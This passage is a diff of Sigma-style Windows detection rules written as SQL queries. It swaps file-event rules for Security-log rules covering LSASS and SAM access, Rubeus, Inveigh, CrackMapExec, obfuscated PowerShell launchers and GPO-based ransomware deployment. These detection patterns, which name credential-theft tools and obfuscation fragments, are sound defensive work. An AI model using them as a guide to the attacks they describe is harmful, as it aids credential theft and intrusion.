(Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 
'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Online\\\\Reporting\\\\MonitoringAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_msconfig_gui.yml" + "filename": "win_security_aadhealth_mon_agent_regkey_access.yml" }, { - "title": "Dynamic CSharp Compile Artefact", - "id": "e4a74e34-ecde-4aab-b2fb-9112dd01aed0", - "status": "test", - "description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution\n", - "author": "frack113", + "title": "LSASS Access from Non System Account", + "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", + "status": "experimental", + "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1027.004" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%.cmdline' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', 
'100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_csharp_compile_artefact.yml" + "filename": "win_security_lsass_access_non_system_account.yml" }, { - "title": "OneNote Attachment File Dropped In Suspicious Location", - "id": "7fd164ba-126a-4d9c-9392-0d4f7c243df0", - "status": "experimental", - "description": "Detects creation of files with the \".one\"/\".onepkg\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote Service Activity via SVCCTL Named Pipe", + "id": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", + "status": "test", + "description": "Detects remote service activity via remote access to the svcctl named pipe", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion" + "attack.lateral_movement", + "attack.persistence", + "attack.t1021.002" ], "falsepositives": [ - "Legitimate usage of \".one\" or \".onepkg\" files from those locations" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.one' ESCAPE '\\' OR TargetFilename LIKE '%.onepkg' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND 
RelativeTargetName = 'svcctl' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" ], - "filename": "file_event_win_office_onenote_files_in_susp_locations.yml" + "filename": "win_security_svcctl_remote_service.yml" }, { - "title": "Suspicious LNK Double Extension Files", - "id": "3215aa19-f060-4332-86d5-5602511f3ca8", - "status": "experimental", - "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "title": "Reconnaissance Activity", + "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "status": "test", + "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", + "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1036.007" + "attack.discovery", + "attack.t1087.002", + "attack.t1069.002", + "attack.s0039" ], "falsepositives": [ - "Users creating a shortcut on e.g. 
desktop" + "Administrator activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.lnk' ESCAPE '\\' AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Excel%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\PowerPoint%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_lnk_double_extension.yml" + "filename": "win_security_susp_net_recon_activity.yml" }, { - "title": "CrackMapExec File Creation Patterns", - "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", - "status": "experimental", - "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "title": "SAM Registry Hive Handle Request", + "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "status": "test", + 
"description": "Detects handles requested to SAM registry hive", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ + "attack.discovery", + "attack.t1012", "attack.credential_access", - "attack.t1003.001" + "attack.t1552.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" - ], - "filename": "file_event_win_crackmapexec_patterns.yml" - }, - { - "title": "Suspicious Files in Default GPO Folder", - "id": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", - "status": "experimental", - "description": 
"Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", - "author": "elhoim", - "tags": [ - "attack.t1036.005", - "attack.defense_evasion" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Policies\\\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" ], - "filename": "file_event_win_susp_default_gpo_dir_write.yml" + "filename": "win_security_sam_registry_hive_handle_request.yml" }, { - "title": "Created Files by Microsoft Sync Center", - "id": "409f8a98-4496-4aaa-818a-c931c0a8b832", - "status": "experimental", - "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", - "author": "elhoim", + "title": "Processes Accessing the Microphone and Webcam", + "id": "8cd538a4-62d5-4e83-810b-12d41e428d6e", + "status": "test", + "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.t1055", - "attack.t1218", - "attack.execution", - "attack.defense_evasion" + "attack.collection", + "attack.t1123" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4663') AND (ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\microphone\\\\NonPackaged%' ESCAPE '\\' OR ObjectName LIKE 
'%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\webcam\\\\NonPackaged%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_creation_by_mobsync.yml" + "filename": "win_security_camera_microphone_access.yml" }, { - "title": "Writing Local Admin Share", - "id": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", - "status": "experimental", - "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", - "author": "frack113", + "title": "Persistence and Execution at Scale via GPO Scheduled Task", + "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", + "status": "test", + "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", + "author": "Samir Bousseaden", "tags": [ + "attack.persistence", "attack.lateral_movement", - "attack.t1546.002" + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\\\\\127.0.0%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" ], - "filename": "file_event_win_writing_local_admin_share.yml" + "filename": "win_security_gpo_scheduledtasks.yml" }, { - "title": "Suspicious Unattend.xml File Access", - "id": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", + "title": "WMI Persistence - Security", + "id": "f033f3f3-fd24-4995-97d8-a3bb17550a88", "status": "test", - "description": "Attempts to access unattend.xml, where 
credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process\n", - "author": "frack113", + "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", "tags": [ - "attack.credential_access", - "attack.t1552.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Unknown (data set is too small; further testing needed)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\unattend.xml' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'WMI Namespace' AND ObjectName LIKE '%subscription%' ESCAPE '\\')" ], - "filename": "file_event_win_access_susp_unattend_xml.yml" + "filename": "win_security_wmi_persistence.yml" }, { - "title": "Suspicious Scheduled Task Write to System32 Tasks", - "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", - "status": "test", - "description": "Detects the creation of tasks from processes executed from suspicious locations", - "author": "Florian Roth (Nextron Systems)", + "title": "Addition of Domain Trusts", + "id": "0255a820-e564-4e40-af2b-6ac61160335c", + "status": "stable", + "description": "Addition of domains is seldom and should be verified for legitimacy.", + "author": "Thomas Patzke", "tags": [ "attack.persistence", - "attack.execution", - "attack.t1053" + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Legitimate extension of domain structure" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR 
NewProcessName LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4706')" ], - "filename": "file_event_win_susp_task_write.yml" + "filename": "win_security_susp_add_domain_trust.yml" }, { - "title": "EVTX Created In Uncommon Location", - "id": "65236ec7-ace0-4f0c-82fd-737b04fd4dcb", + "title": "DiagTrackEoP Default Login Username", + "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", "status": "experimental", - "description": "Detects the creation of new files with the \".evtx\" extension in non-common locations. Which could indicate tampering with default evtx locations in order to evade security controls", - "author": "D3F7A5105", + "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.privilege_escalation" ], "falsepositives": [ - "Admin activity", - "Backup activity" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.evtx' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Containers\\\\BaseImages\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\dllhost.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" ], - "filename": "file_event_win_create_evtx_non_common_locations.yml" + "filename": "win_security_diagtrack_eop_default_login_username.yml" }, { - "title": "Inveigh Execution Artefacts", - "id": 
"bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "title": "Win Susp Computer Name Containing Samtheadmin", + "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", "status": "experimental", - "description": "Detects the presence and execution of Inveigh via dropped artefacts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", + "author": "elhoim", "tags": [ - "attack.command_and_control", - "attack.t1219" + "cve.2021.42278", + "cve.2021.42287", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_inveigh_artefacts.yml" + "filename": "win_security_susp_computer_name.yml" }, { - "title": "Suspicious Double Extension Files", - "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "title": "Invoke-Obfuscation Via Use MSHTA - Security", + "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", "status": "experimental", - "description": "Detects 
dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036.007" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_double_extension.yml" + "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" }, { - "title": "Suspicious Creation TXT File in User Desktop", - "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", + "title": "Register new Logon Process by Rubeus", + "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", "status": "test", - "description": "Ransomware create txt file in the user Desktop", - "author": "frack113", + "description": "Detects potential use of Rubeus 
via registered new trusted logon process", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.impact", - "attack.t1486" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" ], - "filename": "file_event_win_susp_desktop_txt.yml" + "filename": "win_security_register_new_logon_process_by_rubeus.yml" }, { - "title": "Startup Folder File Write", - "id": "2aa0a6b4-a865-495b-ab51-c28249537b75", - "status": "test", - "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - Security", + "id": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", + "status": "experimental", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%rundll32.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\')" + ], + "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml" + }, + { + "title": "ISO Image Mount", + "id": 
"0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", + "status": "experimental", + "description": "Detects the mount of ISO images on an endpoint", + "author": "Syed Hasan (@syedhasan009)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate" + "Software installation ISO files" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp%' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND ObjectServer = 'Security' AND ObjectType = 'File' AND ObjectName LIKE '\\\\Device\\\\CdRom%' ESCAPE '\\') AND NOT (ObjectName LIKE '\\\\Device\\\\CdRom0\\\\setup.exe' ESCAPE '\\'))" ], - "filename": "file_event_win_startup_folder_file_write.yml" + "filename": "win_security_iso_mount.yml" }, { - "title": "CVE-2022-24527 Microsoft Connected Cache LPE", - "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "title": "Invoke-Obfuscation Via Use Rundll32 - Security", + "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", "status": "experimental", - "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1059.001", - "cve.2022.24527" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs 
WHERE (TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "file_event_win_cve_2022_24527_lpe.yml" + "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" }, { - "title": "Creation Exe for Service with Unquoted Path", - "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "title": "Remote WMI ActiveScriptEventConsumers", + "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", - "author": "frack113", + "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", "attack.persistence", - "attack.t1547.009" + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "SCCM" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND 
ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" ], - "filename": "file_event_win_creation_unquoted_service_path.yml" + "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" }, { - "title": "Adwind RAT / JRAT File Artifact", - "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", - "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", + "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.defense_evasion", + "attack.t1027" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE 